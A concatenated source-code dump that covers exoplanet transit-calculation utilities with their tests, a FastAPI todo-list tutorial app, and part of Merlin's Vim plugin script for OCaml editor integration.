return (1 / np.sqrt(2 * np.pi * err ** 2)) * np.exp(
-((data - model) / err) ** 2
)
def blackbody_temperature(bmag, vmag):
"""
calculate blackbody temperature using the Ballesteros formula; Eq. 14 in
https://arxiv.org/pdf/1201.1809.pdf
"""
t_bb = 4600 * (
(1 / (0.92 * (bmag - vmag) + 1.7))
+ (1 / (0.92 * (bmag - vmag) + 0.62))
)
return t_bb
def u_to_q(u1, u2):
"""convert limb-darkening coefficients from q to u
See Kipping 2013, eq. 15 & 16:
https://arxiv.org/pdf/1311.1170v3.pdf
"""
q1 = (u1 + u2) ** 2
q2 = u1 / (2 * (u1 + u2))
return q1, q2
def q_to_u(q1, q2):
"""convert limb-darkening coefficients from q to u
See Kipping 2013, eq. 17 & 18:
https://arxiv.org/pdf/1311.1170v3.pdf
"""
u1 = 2 * np.sqrt(q1) * q2
u2 = np.sqrt(q1) * (1 - 2 * q2)
return u1, u2
def a_from_bkpt14(b, k, p, t14, i=np.pi / 2):
"""scaled semi-major axis [R_sun]
See Winn 2014 ("Transits and Occultations"), eq. 14
RpRs = 0.0092
Check: a_from_bkpt14(b=0, k=RpRs, p=365.25, t14=13/24, i=np.pi/2) = 216.6
"""
assert i < 3.15, "inc should be in radians"
numer = np.sqrt((k + 1) ** 2 - b ** 2)
denom = np.sin(i) * np.sin(t14 * np.pi / p)
return numer / denom
def i_from_abew(a, b, e=0, w=0):
"""Orbital inclination from the impact parameter, scaled semi-major axis, eccentricity and argument of periastron
See Winn 2014 ("Transits and Occultations"), eq. 7
Parameters
----------
b : impact parameter [-]
a : scaled semi-major axis [R_Star]
e : eccentricity [-]
w : argument of periastron [rad]
Returns
-------
i : inclination [rad]
Check: i_from_abew(a=216.6, b=0, e=0, w=0) = np.pi/2 = 1.57
"""
if (e != 0) | (w != 0):
return np.arccos(b / a * (1 + e * np.sin(w)) / (1 - e ** 2))
else:
return np.arccos(b / a)
def b_from_aiew(a, i, e=0, w=0):
"""impact parameter
See Seager & Mallen-Ornelas 2003, eq. 13
"""
return a * np.cos(i)
def t14_ecc(a, b, k, p, e, w, tr_sign=1):
r"""transit duration for eccentric orbit
RpRs = 0.0092
Check: t14_ecc(a=216.6, b=0, k=RpRs, p=365.25, e=0, w=np.pi, tr_sign=1)=0.54=13 hr
"""
# i = i_from_abew(a, b, e, w)
ae = np.sqrt(1.0 - e ** 2) / (1.0 + tr_sign * e * np.sin(w))
return t14_circ(a, b, k, p) * ae
def t14_circ(a, b, k, p):
"""transit duration for circular orbit
See Winn 2014 ("Transits and Occultations"), eq. 14
"""
i = i_from_abew(a, b)
alpha = np.sqrt((1 + k) ** 2 - b ** 2)
return (p / np.pi) * np.arcsin(alpha / np.sin(i) / a)
def t23_circ(a, b, k, p):
"""in-transit duration
See Winn 2014 ("Transits and Occultations"), eq. 15
"""
i = i_from_abew(a, b)
alpha = np.sqrt((1 - k) ** 2 - b ** 2)
return (p / np.pi) * np.arcsin(alpha / np.sin(i) / a)
def t14_from_abkp(a, b, k, p, e=0.0, w=0.0, tr_sign=1):
if (e != 0) | (w != 0):
return t14_ecc(a, b, k, p, e, w, tr_sign)
else:
return t14_circ(a, b, k, p)
def t14max_from_pmrr(p, ms, rs, rp):
"""Compute the maximum transit duration in days:
Eq. 10 in Hippke & Heller 2019
Parameters
----------
p : period [day]
ms : star mass [Msun]
rs : star radius [Rsun]
rp : planet radius [Rearth]
Returns
-------
t14 : transit duration [day]
"""
constant = 4 / (np.pi * c.G)
Porb = p * u.day
Ms = ms * u.Msun.to(u.kg) * u.kg
Rs = rs * u.Rsun.to(u.m) * u.m
Rp = rp * u.Rearth.to(u.m) * u.m
t14 = (Rp + Rs) * (constant * Porb / Ms) ** (1 / 3)
return t14.to(u.day).value
def t14_from_pmrr(p, ms, rs, rp, b=0, mp=0.0, e=0.0, w=0.0):
"""Compute the transit width (duration) in days.
Parameters
----------
p : period [day]
ms : star mass [Msun]
rs : star radius [Rsun]
rp : planet radius [Rearth]
b : impact parameter
e : eccentricity
w : argument of periastron [deg]
Returns
-------
t14 : transit duration [day]
Check: t14_from_pmrr(p=365.25, ms=1, rs=1, rp=1, b=0, e=0, w=0.1)=0.54
"""
sma = sma_from_pmm(p, ms, mp) * u.au.to(u.Rsun)
rp = rp * u.Rearth.to(u.m)
rs = rs * u.Rsun.to(u.m)
ms = ms * u.Msun.to(u.kg)
w = np.deg2rad(w)
return (
p
/ (np.pi * sma)
* np.sqrt((1 + rp / rs) ** 2 - b * b)
* (np.sqrt(1 - e ** 2) / (1 + e * np.sin(w)))
)
def sma_from_pmm(p, ms, mp=0):
""" Compute the semimajor axis in AU from Kepler's third law.
Parameters
----------
p : period [d]
ms : star mass [Msun]
mp : planet mass [Mearth]
Returns
-------
a : semi-major axis [au]
Check: sma_from_mp(365, 1, 1)=
"""
G = c.G.value
p = p * u.day.to(u.second)
mp = mp * u.Mearth.to(u.kg)
ms = ms * u.Msun.to(u.kg)
a = a = (G * (ms + mp) * p ** 2 / (4 * np.pi ** 2)) ** (1.0 / 3)
return a * u.m.to(u.au)
def a_from_prho(p, rho, cgs=True):
"""Scaled semi-major axis from the stellar density and planet's orbital period.
Parameters
----------
period : orbital period [d]
rho : stellar density [g/cm^3]
Returns
-------
as : scaled semi-major axis [R_star]
Check: as_from_prho(rho=1.44, period=365.)=215
Note: 1*u.au.to(u.Rsun)=215
"""
if cgs:
rho = rho * u.g / u.cm ** 3
G = c.G.cgs
else:
rho = rho * u.kg / u.m ** 3
G = c.G
p = (p * u.day.to(u.second)) * u.second
aRs = ((rho * G * p ** 2) / (3 * np.pi)) ** (1 / 3)
return aRs.value
def sma_from_prhor(p, rho, rs):
"""Semi-major axis from the stellar density, stellar radius, and planet's orbital period.
Parameters
----------
rho : stellar density [g/cm^3]
p : orbital period [d]
rs : stellar radius [R_Sun]
Returns
-------
a : semi-major axis [AU]
Check: a_from_prhors(rho=1.41, p=365., rs=1.)=1
"""
return a_from_prho(p, rho) * rs * u.Rsun.to(u.au)
def p_from_am(sma, ms):
"""Orbital period from the semi-major axis and stellar mass.
Parameters
----------
sma : semi-major axis [AU]
ms : stellar mass [M_Sun]
Returns
-------
p : Orbital period [d]
Check: p_from_am(a=1., ms=1.)=365
"""
a = sma * u.au.to(u.m)
ms = ms * u.Msun.to(u.kg)
G = c.G.value
p = np.sqrt((4 * np.pi ** 2 * a ** 3) / (G * ms))
return p * u.second.to(u.day)
def tshape_approx(k, b=0):
"""transit shape approximation
See Seager & Mallen-Ornelas 2003, eq. 15
"""
alpha = (1 - k) ** 2 - b ** 2
beta = (1 + k) ** 2 - b ** 2
return (alpha / beta) ** 0.5
def max_k(tshape):
"""maximum depth due to contaminant
Seager & Mallen-Ornelas 2003, eq. 21
Check: max_k(ts)*u.Rsun.to(u.Rearth)=1
"""
return (1 - tshape) / (1 + tshape)
def af_transit(e, w):
"""Calculates the -- factor during the transit"""
return (1.0 - e ** 2) / (1.0 + e * np.sin(w))
def rho_from_ap(a, p):
"""stellar density assuming circular orbit
See Kipping+2013, eq. 4:
https://arxiv.org/pdf/1311.1170v3.pdf
"""
p = p * u.d
gpcc = u.g / u.cm ** 3
rho_mks = 3 * np.pi / c.G / p ** 2 * a ** 3
return rho_mks.to(gpcc).value
def rho_from_mr(m, r):
"""
m: mass in Msun
r: radius in Rsun
returns
-------
density in g/cm3
"""
vol = (4 / 3) * np.pi * r * u.Rsun.to(u.cm) ** 3
return m * u.Msun.to(u.g) / vol
def rho_from_mr_cgs(m, r, unit="sun", cgs=True):
gcc = u.g / u.cm ** 3
kgmc = u.kg / u.m ** 3
if unit == "sun":
r = r * u.Rsun.to(u.m)
m = m * u.Msun.to(u.kg)
elif unit == "earth":
r = r * u.Rearth.to(u.m)
m = m * u.Mearth.to(u.kg)
elif unit == "jup":
r = r * u.Rjup.to(u.m)
m = m * u.Mjup.to(u.kg)
else:
raise ValueError("unit=[sun,earth,jup]")
volume = (4.0 / 3.0) * np.pi * r ** 3
rho = m / volume
if cgs:
return rho * kgmc.to(gcc)
else:
return rho
def rho_from_prrt(p, rs, rp, t14, b=0, cgs=False):
"""Compute the stellar density in units of the solar density (1.41 g/cm3)
from the transit parameters.
Parameters
----------
p : orbital period [day]
rp : planet radius [Rearth]
rs : star radius [Rsun]
tdur : transit duration [day]
b : impact parameter
Returns
-------
rho K stellar density [gcc]
rp, Rs, T, P = Rearth2m(rp_Rearth), Rsun2m(Rs_Rsun), days2sec(T_days), \
days2sec(P_days)
D = (rp / Rs)**2
rho = 4*np.pi**2 / (P*P*G) * (((1+np.sqrt(D))**2 - \
b*b*(1-np.sin(np.pi*T/P)**2)) / \
(np.sin(np.pi*T/P)**2))**(1.5) # kg/m3
"""
kgmc = u.kg / u.m ** 3
gcc = u.g / u.cm ** 3
G = c.G.value
rs = rs * u.Rsun.to(u.m)
rp = rp * u.Rearth.to(u.m)
t14 = t14 * u.day.to(u.second)
p = p * u.day.to(u.second)
rho = (
4
* np.pi ** 2
/ (G * p ** 2)
* (
((1 + rp / rs) ** 2 - b * b * (1 - np.sin(np.pi * t14 / p) ** 2))
/ (np.sin(np.pi * t14 / p) ** 2)
)
** (1.5)
) # kg/m3
if cgs:
return rho * kgmc.to(gcc)
else:
return rho
def logg_from_rhor(rho, r):
r = (r * u.R_sun).cgs
gpcc = u.g / u.cm ** 3
rho *= gpcc
g = 4 * np.pi / 3 * c.G.cgs * rho * r
return np.log10(g.value)
def logg_from_mr(mp, rp):
"""Compute the surface gravity from the planet mass and radius.
Parameters
----------
m : planet mass [Mearth]
r : planet mass [Rearth]
"""
G = c.G.value
mp = mp * u.Mearth.to(u.kg)
mp = rp * u.Rearth.to(u.m)
return np.log10(G * mp / (rp * rp) * 1e2)
def rho_from_gr(logg, r, cgs=True):
kgmc = u.kg / u.m ** 3
r = (r * u.R_sun).cgs
g = 10 ** logg * u.cm / u.s ** 2
rho = 3 * g / (r * c.G.cgs * 4 * np.pi)
if cgs:
return rho.value
else:
return rho.to(kgmc)
# def logg_southworth(P_days, K_ms, aRp, ecc=0.0, inc_deg=90.0):
# """Compute the surface gravity in m/s^2 from the equation in Southworth
# et al 2007."""
# P, inc = days2sec(P_days), unumpy.radians(inc_deg)
# return (
# 2
# * np.pi
# * K_ms
# * aRp
# * aRp
# * unumpy.sqrt(1 - ecc * ecc)
# / (P * unumpy.sin(inc))
# )
#
#
# def tcirc(P_days, Ms_Msun, mp_Mearth, rp_Rearth):
# """Compute the circularization timescale for a rocky planet
# in years. From Goldreich & Soter 1966."""
# Q = 1e2 # for a rocky exoplanet
# P, Ms, mp, rp, sma = (
# days2yrs(P_days),
# Msun2kg(Ms_Msun),
# Mearth2kg(mp_Mearth),
# Rearth2m(rp_Rearth),
# semimajoraxis(P_days, Ms_Msun, mp_Mearth),
# )
# return 2.0 * P * Q / (63 * np.pi) * mp / Ms * (AU2m(sma) / rp) ** 5
#
#
# def sample_rhostar(a_samples, p):
# """
# Given samples of the scaled semi-major axis and the period,
# compute samples of rhostar
# """
# rho = []
# n = int(1e4) if len(a_samples) > 1e4 else len(a_samples)
# for a in a_samples[np.random.randint(len(a_samples), size=n)]:
# rho.append(rho_from_mr(p, a).value)
# return np.array(rho)
#
#
# def sample_logg(rho_samples, rstar, urstar):
# """
# Given samples of the stellar density and the stellar radius
# (and its uncertainty), compute samples of logg
# """
# rs = rstar + urstar * np.random.randn(len(rho_samples))
# idx = rs > 0
# return logg(rho_samples[idx], rs[idx])
#
#
# def sample_ephem(orb, tc_samples, n=10000):
# tc_samples = np.array(tc_samples).T
# ephem = []
# for tc_s in tc_samples[np.random.randint(tc_samples.shape[0], size=n)]:
# ephem.append(stats.simple_ols(orb, tc_s))
# return np.array(ephem)
#
#
#
#
# def ll_normal_es(o, m, e):
# """Normal log likelihood for scalar err: average standard deviation."""
# return (
# -o.size * np.log(e)
# - 0.5 * o.size * LOG_TWO_PI
# - 0.5 * np.square(o - m).sum() / e ** 2
# )
#
#
# def ll_normal_ev(o, m, e):
# """Normal log likelihood for vector err"""
# return (
# -np.sum(np.log(e))
# - 0.5 * o.size * LOG_TWO_PI
# - 0.5 * np.sum((o - m) ** 2 / e ** 2)
# )
#
#
# class TransitModel:
# """Parameterization: k,q1,q2,tc,p,rho,b"""
#
# def __init__(self, time, e=0, w=0, ld_power="quadratic"):
# self.time = time
# self.transit_params = batman.TransitParams()
# self.transit_params.limb_dark = ld_power
# self.pv = None
# self.e = e
# self.w = w
#
# def compute_flux(self, param):
# """Transit model based on batman"""
# t0, p, k, rho, b, q1, q2 = [
# param.get(i) for i in "t0 p k rho b q1 q2".split()
# ]
# a = a_from_prho(p, rho)
# inc = np.rad2deg(i_from_abew(a, b, e=self.e, w=self.w))
#
# self.transit_params.t0 = t0
# self.transit_params.per = p
# self.transit_params.rp = k
# self.transit_params.a = a
# self.transit_params.inc = inc
# self.transit_params.u = q_to_u(q1, q2)
# self.transit_params.ecc = self.e
# self.transit_params.w = self.w
# m = batman.TransitModel(self.transit_params, self.time)
# return m.light_curve(self.transit_params)
#
#
# if __name__ == "__main__":
# time = np.linspace(-0.5, 0.5, 100)
# params = {
# "t0": 0.0,
# "p": 8.0,
# "k": 0.1,
# "rho": 1.41,
# "b": 0.1,
# "q1": 0.1,
# "q2": 0.1,
# }
#
# tm = TransitModel(time, e=0, w=0)
#
# model = tm.compute_flux(params)
# pl.plot(time, model, "-")
# pl.xlabel("Time [days]")
# pl.ylabel("Relative Flux")
# pl.show()
# https://gist.github.com/danhey/804a224d96823d0b3406a1c4118048c4
def from_geometry(dphi):
psi = newton(compute_psi, 0.5, args=(dphi,))
ecc = np.abs(ecc_func(psi))
w = argper(ecc, psi)
return ecc, w
def compute_psi(psi, dphi):
return psi - np.sin(psi) - 2 * np.pi * dphi
def ecc_func(psi):
return np.sin(0.5 * (psi - np.pi)) * (
1.0 - 0.5 * (np.cos(0.5 * (psi - np.pi))) ** 2
) ** (-0.5)
def argper(ecc, psi):
if ecc <= 0.0:
return 0.0
return np.arccos(
1.0 / ecc * (1.0 - ecc ** 2) ** 0.5 * np.tan(0.5 * (psi - np.pi))
)
def a_au(ms, p):
"""
ms : stellar mass [Solar]
p : period [days]
returns : semi-major axis [AU]
"""
return (ms * (p / 365.25) ** 2) ** (1.0 / 3.0)
def teq_k(teff, rs, a, a_b=0.3):
"""
teff : stellar effective temperature [Kelvin]
rs : stellar radius [Solar]
a : semi-major axis [AU]
a_b : bond albedo (unitless: highly irradiated gas giants = 0.3)
returns : equilibrium temperature [Kelvin]
"""
return ((1.0 - a_b) ** 0.25) * np.sqrt(rs / (2 * a * 215.094)) * teff
pct_to_err = lambda x: (x[1], x[2] - x[1], x[1] - x[0])
# def lnlike(theta, t, f):
# """
# """
# k, t0, p, a, b, q1, q2, sig, c0, c1, c2, c3 = theta
# m = K2_transit_model(theta, t) + baseline(theta, t)
# resid = f - m
# inv_sigma2 = 1.0 / (sig ** 2)
#
# return -0.5 * (np.sum((resid) ** 2 * inv_sigma2 - np.log(inv_sigma2)))
#
#
# def lnprob(theta, t, f):
# """
# """
# k, t0, p, a, b, q1, q2, sig, c1, c2, c3, c4 = theta
# inc = np.arccos(b / a)
# if np.any(np.array(theta[:-4]) < 0):
# return -np.inf
# if inc > np.pi / 2.0:
# return -np.inf
#
# ll = lnlike(theta, t, f)
# return ll if np.isfinite(ll) else -np.inf
#
#
# def solve_w(obs, y):
# """
# solve for constant coefficients;
# sys_model is evaluate simply by np.dot(X,w)
# """
# X = np.c_[np.atleast_2d(obs).T]
# try:
# w = np.linalg.solve(np.dot(X.T, X), np.dot(X.T, y))
# except:
# w = np.linalg.lstsq(X, y)
# return w, X
#
#
# def systematics_model(w, aux_vec, time):
# """
# systematics model consists of linear combination
# of constant coefficients (computed here)
# and auxiliary vectors:
#
# top n observables, vert_offset, time
#
# The functional form of the model is
# s = w0+w1X1+w2X2+...+wnXn
# """
#
# vert_offset = np.ones_like(time)
# # construct X with time
# X = np.c_[np.concatenate((vert_offset[None, :], time[None, :], aux_vec)).T]
#
# # compute systematics model
# sys_model = np.dot(X, w)
#
# # make sure no nan
# # assert np.any(~np.isnan(sys_model))
#
# return sys_model
# def RM_K(vsini_kms, rp_Rearth, Rs_Rsun):
# '''Compute the approximate semi-amplitude for the Rossiter-McLaughlin
# effect in m/s.'''
# D = (Rearth2m(rp_Rearth) / Rsun2m(Rs_Rsun))**2
# return (vsini_kms*D / (1-D)) * 1e3
#
# def logg_model(mp_Mearth, rp_Rearth):
# '''Compute the surface gravity from the planet mass and radius.'''
# mp, rp = Mearth2kg(mp_Mearth), Rearth2m(rp_Rearth)
# return np.log10(G*mp/(rp*rp) * 1e2)
#
#
# def logg_southworth(P_days, K_ms, aRp, ecc=0., inc_deg=90.):
# '''Compute the surface gravity in m/s^2 from the equation in Southworth
# et al 2007.'''
# P, inc = days2sec(P_days), unumpy.radians(inc_deg)
# return 2*np.pi*K_ms*aRp*aRp * unumpy.sqrt(1-ecc*ecc) / (P*unumpy.sin(inc))
#
#
# def tcirc(P_days, Ms_Msun, mp_Mearth, rp_Rearth):
# '''Compute the circularization timescale for a rocky planet
# in years. From Goldreich & Soter 1966.'''
# Q = 1e2 # for a rocky exoplanet
# P, Ms, mp, rp, sma = days2yrs(P_days), Msun2kg(Ms_Msun), \
# Mearth2kg(mp_Mearth), Rearth2m(rp_Rearth), \
# semimajoraxis(P_days, Ms_Msun, mp_Mearth)
# return 2.*P*Q/(63*np.pi) * mp/Ms * (AU2m(sma) / rp)**5
#
#
# def transmission_spectroscopy_depth(Rs_Rsun, mp_Mearth, rp_Rearth, Teq, mu,
# Nscaleheights=5):
# '''Compute the expected signal in transit spectroscopy in ppm assuming
# the signal is seen at 5 scale heights.'''
# g = 10**logg_model(mp_Mearth, rp_Rearth) * 1e-2
# rp = Rearth2m(rp_Rearth)
# D = (rp / Rsun2m(Rs_Rsun))**2
# H = kb*Teq / (mu*mproton*g)
# return Nscaleheights * 2e6 * D * H / rp
#
#
# def stellar_density(P_days, T_days, Rs_Rsun, rp_Rearth, b):
# '''Compute the stellar density in units of the solar density (1.41 g/cm3)
# from the transit parameters.'''
# rp, Rs, T, P = Rearth2m(rp_Rearth), Rsun2m(Rs_Rsun), days2sec(T_days), \
# days2sec(P_days)
# D = (rp / Rs)**2
# rho = 4*np.pi**2 / (P*P*G) * (((1+np.sqrt(D))**2 - \
# b*b*(1-np.sin(np.pi*T/P)**2)) / \
# (np.sin(np.pi*T/P)**2))**(1.5) # kg/m3
# rhoSun = 3*Msun2kg(1) / (4*np.pi*Rsun2m(1)**3)
# return rho / rhoSun
#
#
# def astrometric_K(P_days, Ms_Msun, mp_Mearth, dist_pc):
# '''Compute the astrometric semi-amplitude in micro-arcsec.'''
# P, Ms, mp, dist = days2sec(P_days), Msun2kg(Ms_Msun), \
# Mearth2kg(mp_Mearth), pc2m(dist_pc)
# Krad = (G*P*P / (4*np.pi*np.pi*Ms*Ms))**(1./3) * mp /dist
# return np.rad2deg(Krad) * 3.6e3 * 1e6
#
#
# def is_Lagrangestable(Ps, Ms, mps, eccs):
# '''Compute if a system is Lagrange stable (conclusion of barnes+
# greenberg 06).
# mp_i = Mearth'''
# Ps, mps, eccs = np.array(Ps), np.array(mps), np.array(eccs)
# smas = AU2m(semimajoraxis(Ps, Ms, mps))
# stable = np.zeros(mps.size-1)
# for i in range(1, mps.size):
# mu1 = Mearth2kg(mps[i-1]) / Msun2kg(Ms)
# mu2 = Mearth2kg(mps[i]) / Msun2kg(Ms)
# alpha = mu1+mu2
# gamma1 = np.sqrt(1-float(eccs[i-1])**2)
# gamma2 = np.sqrt(1-float(eccs[i])**2)
# delta = np.sqrt(smas[i]/smas[i-1])
# deltas = np.linspace(1.000001, delta, 1e3)
# LHS = alpha**(-3.) * (mu1 + mu2/(deltas**2)) * \
# (mu1*gamma1 + mu2*gamma2*deltas)**2
# RHS = 1. + 3**(4./3) * mu1*mu2/(alpha**(4./3))
# fint = interp1d(LHS, deltas, bounds_error=False, fill_value=1e8)
# deltacrit = fint(RHS)
# stable[i-1] = True if delta >= 1.1*deltacrit else False
# return stable
# dphi = ph_secondary - ph_primary
# geom_ecc, geom_per0 = from_geometry(dphi)
```
#### File: chronos/tests/test_diamante.py
```python
from matplotlib.axes import Axes
import lightkurve as lk
from chronos import Diamante
TICID = 460205581
TOIID = 837
SECTOR = 10
QUALITY_BITMASK = "default"
d = Diamante(
ticid=TICID,
# toiid=TOIID,
# sector=SECTOR,
lc_num=1,
aper_radius=2,
# quality_bitmask=QUALITY_BITMASK,
)
def test_diamante_init():
assert isinstance(d.lc, lk.LightCurve)
def test_diamante_plot():
ax = d.lc.plot()
assert isinstance(ax, Axes)
```
#### File: chronos/tests/test_gls.py
```python
from chronos import LongCadence, Gls
TICID = 460205581
SECTOR = 10
def test_gls():
"""
"""
sc = LongCadence(ticid=TICID, sector=SECTOR)
lc = sc.make_custom_lc()
data = lc.time, lc.flux, lc.flux_err
gls = Gls(data, Pbeg=1, verbose=False)
assert isinstance(gls.best, dict)
# fig = gls.plot(block=True)
# fig = gls.plot(block=False)
# assert isinstance(fig, Figure)
```
#### File: chronos/tests/test_lightcurve.py
```python
import lightkurve as lk
# from matplotlib.figure import Figure
from matplotlib.axes import Axes
from chronos import Tess, ShortCadence, LongCadence
TOIID = 837
TICID = 460205581
SECTOR = 10
CUTOUT_SIZE = (15, 15)
QUALITY_BITMASK = "default"
def test_tess_methods():
t = Tess(toiid=TOIID)
ax = t.plot_pdc_sap_comparison()
assert isinstance(ax, Axes)
lcs = t.get_lightcurves()
assert isinstance(lcs, lk.LightCurve)
def test_sc_pipeline():
"""
"""
sc = ShortCadence(
ticid=TICID, sap_mask="pipeline", quality_bitmask=QUALITY_BITMASK
)
_ = sc.get_lc()
assert isinstance(sc.lc_pdcsap, lk.LightCurve)
assert isinstance(sc.lc_sap, lk.LightCurve)
def test_sc_square():
"""
"""
sc = ShortCadence(
ticid=TICID,
sap_mask="square",
aper_radius=1,
threshold_sigma=5,
percentile=95,
quality_bitmask=QUALITY_BITMASK,
)
_ = sc.make_custom_lc()
assert isinstance(sc.lc_custom, lk.LightCurve)
# assert sc.sap_mask == "square"
def test_sc_round():
"""
"""
sc = ShortCadence(
ticid=TICID,
sap_mask="round",
aper_radius=1,
quality_bitmask=QUALITY_BITMASK,
)
_ = sc.make_custom_lc()
assert isinstance(sc.lc_custom, lk.LightCurve)
# assert sc.sap_mask == "round"
def test_sc_threshold():
"""
"""
sc = ShortCadence(
ticid=TICID,
sap_mask="threshold",
threshold_sigma=5,
quality_bitmask=QUALITY_BITMASK,
)
_ = sc.make_custom_lc()
assert isinstance(sc.lc_custom, lk.LightCurve)
# assert sc.sap_mask == "threshold"
def test_sc_percentile():
"""
"""
sc = ShortCadence(
ticid=TICID,
sap_mask="percentile",
percentile=90,
quality_bitmask=QUALITY_BITMASK,
)
_ = sc.make_custom_lc()
assert isinstance(sc.lc_custom, lk.LightCurve)
# assert sc.sap_mask == "percentile"
def test_sc_triceratops():
"""
"""
sc = ShortCadence(ticid=TICID, calc_fpp=True)
# df = sc.get_NEB_depths()
# df = sc.get_fpp(flat=flat, plot=False)
assert sc.triceratops is not None
def test_lc():
"""
"""
lc = LongCadence(
ticid=TICID,
sap_mask="square",
aper_radius=1,
cutout_size=CUTOUT_SIZE,
quality_bitmask=QUALITY_BITMASK,
)
_ = lc.make_custom_lc()
assert isinstance(lc.lc_custom, lk.LightCurve)
def test_lc_triceratops():
"""
"""
lc = LongCadence(ticid=TICID, calc_fpp=True)
# df = sc.get_NEB_depths()
# df = sc.get_fpp(flat=flat, plot=False)
assert lc.triceratops is not None
``` |
{
"source": "jpdeleon/fcc_tutorials",
"score": 2
} |
#### File: webapps/fastapi/app.py
```python
from fastapi import FastAPI, Depends, Request, Form, status
from starlette.responses import RedirectResponse
from starlette.templating import Jinja2Templates
from sqlalchemy.orm import Session
import models
from database import SessionLocal, engine
models.Base.metadata.create_all(bind=engine)
templates = Jinja2Templates(directory="templates")
app = FastAPI()
# Dependency
def get_db():
db = SessionLocal()
try:
yield db
finally:
db.close()
@app.get("/")
def home(request: Request, db: Session = Depends(get_db)):
todos = db.query(models.Todo).all()
return templates.TemplateResponse("base.html",
{"request": request, "todo_list": todos})
@app.post("/add")
def add(request: Request, title: str = Form(...), db: Session = Depends(get_db)):
new_todo = models.Todo(title=title)
db.add(new_todo)
db.commit()
url = app.url_path_for("home")
return RedirectResponse(url=url, status_code=status.HTTP_303_SEE_OTHER)
@app.get("/update/{todo_id}")
def update(request: Request, todo_id: int, db: Session = Depends(get_db)):
todo = db.query(models.Todo).filter(models.Todo.id == todo_id).first()
todo.complete = not todo.complete
db.commit()
url = app.url_path_for("home")
return RedirectResponse(url=url, status_code=status.HTTP_302_FOUND)
@app.get("/delete/{todo_id}")
def delete(request: Request, todo_id: int, db: Session = Depends(get_db)):
todo = db.query(models.Todo).filter(models.Todo.id == todo_id).first()
db.delete(todo)
db.commit()
url = app.url_path_for("home")
return RedirectResponse(url=url, status_code=status.HTTP_302_FOUND)
``` |
{
"source": "jpdeplaix/merlin",
"score": 2
} |
#### File: merlin/autoload/merlin.py
```python
import subprocess
import signal
import json
import vim
import re
import os
import sys
from itertools import groupby
import vimbufsync
vimbufsync.check_version("0.1.0",who="merlin")
flags = []
enclosing_types = [] # nothing to see here
current_enclosing = -1
atom_bound = re.compile('[a-z_0-9A-Z\'`.]')
class MerlinExc(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class Failure(MerlinExc):
pass
class Error(MerlinExc):
pass
class MerlinException(MerlinExc):
pass
######## COMMUNICATION
class MerlinProcess:
def __init__(self):
self.mainpipe = None
self.saved_sync = None
def restart(self):
if self.mainpipe:
try:
try:
self.mainpipe.terminate()
except OSError:
pass
self.mainpipe.communicate()
except OSError:
pass
try:
command = [vim.eval("merlin#FindOcamlMerlin()"),"-ignore-sigint"]
command.extend(flags)
self.mainpipe = subprocess.Popen(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=None,
)
except OSError as e:
print("Failed starting ocamlmerlin. Please ensure that ocamlmerlin binary\
is executable.")
raise e
def send_command(self, *cmd):
if self.mainpipe == None or self.mainpipe.returncode != None:
self.restart()
json.dump(cmd, self.mainpipe.stdin)
line = self.mainpipe.stdout.readline()
result = json.loads(line)
content = None
if len(result) == 2:
content = result[1]
if result[0] == "return":
return content
elif result[0] == "failure":
raise Failure(content)
elif result[0] == "error":
raise Error(content)
elif result[0] == "exception":
raise MerlinException(content)
merlin_processes = {}
def merlin_process():
global merlin_processes
name = vim.eval("exists('b:merlin_project') ? b:merlin_project : ''")
if not name in merlin_processes:
merlin_processes[name] = MerlinProcess()
return merlin_processes[name]
def send_command(*cmd):
return merlin_process().send_command(*cmd)
def dump(*cmd):
print(send_command('dump', *cmd))
def try_print_error(e, msg=None):
try:
raise e
except Error as e:
if msg: print(msg)
else:
print(e.value['message'])
except Exception as e:
if msg: sys.stderr.write(msg)
else:
msg = str(e)
if re.search('Not_found',msg):
print ("error: Not found")
return None
elif re.search('Cmi_format.Error', msg):
sys.stderr.write ("error: The version of merlin you're using doesn't support this version of ocaml")
return None
sys.stderr.write(msg)
def catch_and_print(f, msg=None):
try:
return f()
except MerlinExc as e:
try_print_error(e, msg=msg)
######## BASIC COMMANDS
def command_reload(full=False):
if full:
return send_command("refresh")
else:
return send_command("refresh", "quick")
def command_reset(name=None):
global saved_sync
if name:
r = send_command("reset","name",name)
else:
r = send_command("reset")
if name == "myocamlbuild.ml":
command_find_use("ocamlbuild")
saved_sync = None
return r
def command_tell(kind,content):
if content == None:
return send_command("tell", "end")
elif type(content) is list:
return send_command("tell", kind, "\n".join(content) + "\n")
else:
return send_command("tell", kind, content)
def command_which_file(name):
return send_command('which', 'path', name)
def command_which_with_ext(ext):
return send_command('which', 'with_ext', ext)
def command_ext_enable(*packages):
return send_command('extension', 'enable', packages)
def command_ext_disable(*packages):
return send_command('extension', 'disable', packages)
def command_ext_list():
return send_command('extension', 'list')
def command_ext_enabled():
return send_command('extension', 'list', 'enabled')
def command_ext_disabled():
return send_command('extension', 'list', 'disabled')
def display_load_failures(result):
if 'failures' in result:
print (result['failures'])
return result['result']
def command_find_use(*packages):
result = catch_and_print(lambda: send_command('find', 'use', packages))
return display_load_failures(result)
def command_find_list():
return send_command('find', 'list')
def command_seek_before(line,col):
position = send_command("seek", "before", {'line' : line, 'col': col})
return (position['line'], position['col'])
def command_seek_exact(line,col):
position = send_command("seek", "exact", {'line' : line, 'col': col})
return (position['line'], position['col'])
def command_seek_scope():
return send_command("seek", "maximize_scope")
def command_seek_end():
return send_command("seek", "end")
def command_complete_cursor(base,line,col):
return send_command("complete", "prefix", base, "at", {'line' : line, 'col': col})
def command_report_errors():
return send_command("errors")
def command_locate(path, line, col):
try:
if line is None or col is None:
return send_command("locate", path)
else:
pos_or_err = send_command("locate", path, "at", {'line': line, 'col': col})
if not isinstance(pos_or_err, dict):
print(pos_or_err)
else:
l = pos_or_err['pos']['line']
c = pos_or_err['pos']['col']
if "file" in pos_or_err:
vim.command(":split %s" % pos_or_err['file'])
vim.current.window.cursor = (l, c)
except MerlinExc as e:
try_print_error(e)
######## BUFFER SYNCHRONIZATION
def sync_buffer_to(to_line, to_col):
process = merlin_process()
saved_sync = process.saved_sync
curr_sync = vimbufsync.sync()
cb = vim.current.buffer
max_line = len(cb)
end_line = min(to_line, max_line)
if saved_sync and curr_sync.bufnr() == saved_sync.bufnr():
line, col = saved_sync.pos()
line, col = command_seek_before(line, 0)
if line <= end_line:
rest = cb[line-1][col:]
content = cb[line:end_line]
content.insert(0, rest)
process.saved_sync = curr_sync
else:
content = None
else:
